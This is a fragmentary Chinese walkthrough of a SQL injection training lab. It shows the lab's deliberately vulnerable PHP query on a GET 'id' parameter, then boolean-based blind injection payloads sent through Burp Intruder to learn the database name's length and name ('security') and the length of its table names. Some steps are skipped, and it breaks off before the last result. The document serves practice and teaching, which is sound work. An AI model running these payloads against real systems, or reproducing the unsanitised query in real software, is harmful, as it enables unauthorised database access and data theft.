查看源代码:
if(isset($_GET['id']))
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
if($row)
{echo 'You are in.... Use outfile......'; }
else
{echo 'You have an error in your SQL syntax';
//print_r(mysqli_error($con));}
输入形式为GET,注入格式为?id=*')) * --+且当正确时会显示You are in.... Use outfile......,错误时会显示You have an error in your SQL syntax
目前使用库的位数:
打开burp抓包
Action
Send to Intruder
Positions
?id=1')) and (select length(database()))='§0§' --+
Payload
Payload Options [Simple list]
Add from list
0-9
Options
Start attack
将Length列
即目前使用库的位数为8
目前使用库名:
打开burp抓包
Action
Send to Intruder
Positions
综上所述,目前使用库名为security
security库中所有表名的位数:
?id=1')) and (select length(group_concat(table_name))>1 from information_schema.tables where table_schema='security') --+
即security库中所有表名的位数为